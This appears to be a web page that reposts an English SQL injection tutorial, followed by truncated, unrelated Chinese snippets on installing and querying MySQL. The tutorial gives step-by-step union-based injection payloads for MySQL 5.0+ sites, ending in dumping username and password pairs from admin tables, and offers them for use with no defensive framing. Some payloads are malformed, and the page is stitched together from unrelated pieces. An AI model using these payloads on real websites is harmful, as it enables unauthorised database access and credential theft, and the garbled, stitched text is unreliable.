[Injection]对MYSQL 5.0服务器以上版本注入
by ZaraByte
How to do a SQL Injection for MYSQL Server 5.0+
1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2. order by #–
Keep upping the # until you get an error.
3. union all select 1,#,#,#,#,#–
Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them
4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2
5. concat_ws(0×3A,version(),@@version) in vulnerable column
add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version
Will show the version of the SQL Server recommended that it be 5.0
6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–
This selects all the the tables from the database.
7. Find a table your after like admin or like users or user whatever table you wanna see
8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)–
Replace x with the ASCII of table name You will need to convert Text to ASCII.
9. union all select 1,group_concat(table_name,0×3a,table_name)#,#,#,# from column_name–
Replace table_name with the table name your after the 0×3a is hex for “:” table_name would be replaced with the other table name yours after
so for example say you found a table named admin and you wanna see the username and password columns you’d do
union all select 1,group_concat(username,0×3a,password,0×3c62723e)#,#,#,# from table_name–
Basically its going to show the username 0×3a is hex for “:” then the password 0×3c62723e is hex for a “< br >” which breaks them
要安装 MySQL,可以在终端提示符后运行下列命令:
sudo apt-get install mysql-server
sudo apt-get install mysql-client
sudo apt-get install php5-mysql
// 安装php5-mysql 是将php和mysql连接起来
一旦安装完成,MySQL 服务器应该自动启动。您可以在终端提示符后运行以下命令来检查 MySQL 服务器是否正在运行: ......
my.cnf文件是 ......
MySQL 4.1.x开始支持以下这些事情
· 使 ......
echo on
cd c:\Program Files\MySQL\MySQL Server 5.2\bin
mysql -uroot -ppass
show databases;
use mysql; //打开库,
show tables;
describe 表名;
create database 库名;
use 库名;
creat ......
关键字: mysql
MySQL 乱码的根源是的 MySQL 字符集设置不当的问题,本文汇总了有关查看 MySQL 字符集的命令。包括查看 MySQL 数据库服务器字符集、查看 MySQL 数据库字符集,以及数据表和字段的字符集、当前安装的 MySQL 所支持的字符集等。
一、查看 MySQL 数据库服务器和数据库字符集。
mysql> show variab ......